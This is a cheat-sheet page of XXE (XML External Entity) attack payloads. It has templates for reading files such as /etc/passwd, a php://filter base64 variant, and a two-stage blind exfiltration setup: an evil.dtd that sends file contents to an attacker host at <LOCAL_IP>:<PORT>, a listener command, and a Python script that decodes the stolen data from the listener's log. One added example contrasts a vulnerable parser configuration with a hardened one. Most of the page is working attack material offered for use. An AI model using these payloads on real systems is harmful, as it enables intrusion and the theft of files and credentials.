TLDRBins / XXE (XML External Entity)



XXE Template

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY data SYSTEM "<FILE>">]>
<<TAG>>
  <<TAG1>>&data;</<TAG1>>
</<TAG>>

<FILE> is a URI the parser can open (file:///etc/passwd, or an http:// URL to reach hosts behind the target); <TAG> and <TAG1> are the element names the application actually reads, so take them from a legitimate request. The read is only visible when the parser substitutes external entities (e.g. PHP/libxml2 with LIBXML_NOENT, or a Java DocumentBuilderFactory left at its defaults) and the application reflects the text of <TAG1> in its response; if it does not, use the external DTD payload further down to exfiltrate out of band.
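The template above, run end to end as an added example (my code, not TLDRBins'): Python's xml.sax parser is used once with external general entities enabled, which is the vulnerable configuration, and once with them disabled, which is the fix. Assumed for the example: <TAG> is root, <TAG1> is item, an application that echoes the text of <item> back, and a secret file that the script writes itself so that nothing real is read.

```python
"""Added example (not TLDRBins' own code): the first XXE template against a
parser that resolves external entities and against one that does not.

Assumptions (mine, not the page's): <TAG>=root, <TAG1>=item, the application
reflects the text of <item>, and the secret file is created here so the script
runs offline."""
import io
import os
import pathlib
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges
from xml.sax.xmlreader import InputSource

# Same shape as the page's template with <TAG>, <TAG1> and <FILE> filled in.
TEMPLATE = (
    '<?xml version="1.0" encoding="UTF-8"?>\n'
    '<!DOCTYPE foo [<!ENTITY data SYSTEM "{file_uri}">]>\n'
    '<root>\n'
    '  <item>&data;</item>\n'
    '</root>\n'
)


class ItemText(ContentHandler):
    """Collects the character data inside <item>, as an echoing app would."""

    def __init__(self):
        super().__init__()
        self.in_item = False
        self.parts = []

    def startElement(self, name, attrs):
        self.in_item = name == "item"

    def endElement(self, name):
        if name == "item":
            self.in_item = False

    def characters(self, content):
        if self.in_item:
            self.parts.append(content)

    @property
    def text(self):
        return "".join(self.parts)


def parse_item(xml_text, resolve_external):
    """Return the text of <item>. resolve_external=True reproduces the
    vulnerable setting (external general entities are fetched and
    substituted); False is the hardened setting, the default since Python 3.8."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external)
    handler = ItemText()
    parser.setContentHandler(handler)
    source = InputSource()
    source.setByteStream(io.BytesIO(xml_text.encode("utf-8")))
    parser.parse(source)
    return handler.text


def demo(secret="flag{constructed-secret}"):
    """Write a constructed secret file, build the payload against it and parse
    it both ways. Returns (text seen by vulnerable parser, text seen by
    hardened parser)."""
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as fh:
        fh.write(secret)
    try:
        file_uri = pathlib.Path(fh.name).as_uri()   # file:///tmp/....txt
        payload = TEMPLATE.format(file_uri=file_uri)
        leaked = parse_item(payload, resolve_external=True)
        safe = parse_item(payload, resolve_external=False)
    finally:
        os.unlink(fh.name)
    return leaked, safe


if __name__ == "__main__":
    leaked, safe = demo()
    print("vulnerable parser returned:", repr(leaked))
    print("hardened parser returned:  ", repr(safe))
```

The only difference between the two runs is the external-general-entities feature; with it off the parser still accepts the DOCTYPE and the entity reference but substitutes nothing, which is exactly what to check for when reviewing a parser configuration.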

XXE Template (With PHP Filter)

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY data SYSTEM "php://filter/convert.base64-encode/resource=<FILE>">]>
<<TAG>>
  <<TAG1>>&data;</<TAG1>>
</<TAG>>

PHP targets only. The php://filter wrapper base64-encodes the file before it is substituted, so files that contain <, & or non-UTF-8 bytes (PHP source, config files, binaries) no longer break the XML; decode the reflected value with base64 -d.

External DTD (2 Stage)

For blind XXE, where the response does not reflect the entity: the parser first fetches a DTD from your host, then makes a second request whose URL carries the file contents.

1. Create an evil.dtd

<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=<FILE>">
<!ENTITY % eval "<!ENTITY exfil SYSTEM 'http://<LOCAL_IP>:<PORT>/data?%data;'>">

%data; is a parameter-entity reference inside an entity value, which the XML spec allows in an external DTD but not in the internal subset of the document; that is why the nested declaration has to live in evil.dtd rather than in the payload itself. On a non-PHP target replace the php://filter URI with file:///<FILE>, but expect newlines and special characters in the file to break the outbound URL.

2. Host a server (run it in the directory that holds evil.dtd)

python3 -m http.server <PORT>

3. XXE

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY % bar SYSTEM "http://<LOCAL_IP>:<PORT>/evil.dtd">
  %bar;
  %eval;
]>
<<TAG>>
  <<TAG1>>&exfil;</<TAG1>>
</<TAG>>

%bar; pulls evil.dtd from your server, %eval; declares exfil with the base64 already substituted into its URL, and &exfil; makes the parser request http://<LOCAL_IP>:<PORT>/data?<base64>. The file shows up in the http.server log as the path of that request (the 404 it answers is irrelevant); decode the query string with base64 -d. Start with small files: http.server rejects request lines over 64 KiB with a 414, and other listeners have limits of their own.
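Recovering the file from the listener log, as an added example (my code, not TLDRBins'): the log lines are constructed to look like what python3 -m http.server prints for the two requests the payload causes, the /data? path is the one from the template, and the helper goes a little beyond the page by tolerating a client that percent-encodes the base64 and by repairing padding lost when a request was cut short.

```python
"""Added example (not TLDRBins' own code): decode the file that the two-stage
payload delivers to the `python3 -m http.server` listener.

http.server prints one line per request; the base64 produced by php://filter
arrives as the query string of GET /data?.... SAMPLE_LOG is constructed for
this example, not captured from a target."""
import base64
import re
from urllib.parse import unquote

# Request line as http.server logs it; group 1 is the base64 payload.
EXFIL_RE = re.compile(r'"GET /data\?([^ "]*) HTTP/[0-9.]+"')

# Constructed: the DTD fetch followed by the exfil request for a passwd file
# that holds only the root line.
SAMPLE_LOG = """\
127.0.0.1 - - [01/Jan/2024 12:00:00] "GET /evil.dtd HTTP/1.0" 200 -
127.0.0.1 - - [01/Jan/2024 12:00:00] "GET /data?cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaAo= HTTP/1.0" 404 -
"""


def decode_exfil(log_line):
    """Decode the file content carried by one exfil request line; raises
    ValueError for any other line (for example the evil.dtd fetch)."""
    m = EXFIL_RE.search(log_line)
    if m is None:
        raise ValueError("not an exfil request line")
    b64 = unquote(m.group(1))      # tolerate a client that percent-encodes '=' or '/'
    if len(b64) % 4 == 1:          # a lone trailing character can never decode: drop it
        b64 = b64[:-1]
    b64 += "=" * (-len(b64) % 4)   # restore padding lost to copy/paste or a cut request
    return base64.b64decode(b64, validate=True).decode("utf-8", errors="replace")


def collect_exfil(log_text):
    """Decode every exfil request in a listener log, skipping other lines."""
    out = []
    for line in log_text.splitlines():
        if EXFIL_RE.search(line):
            out.append(decode_exfil(line))
    return out


if __name__ == "__main__":
    for content in collect_exfil(SAMPLE_LOG):
        print(content, end="")
```

Pipe the listener's stderr into a file and run collect_exfil over it; a truncated request decodes to a truncated file rather than failing, so a short result is the hint to move to a smaller target file or a different exfil channel.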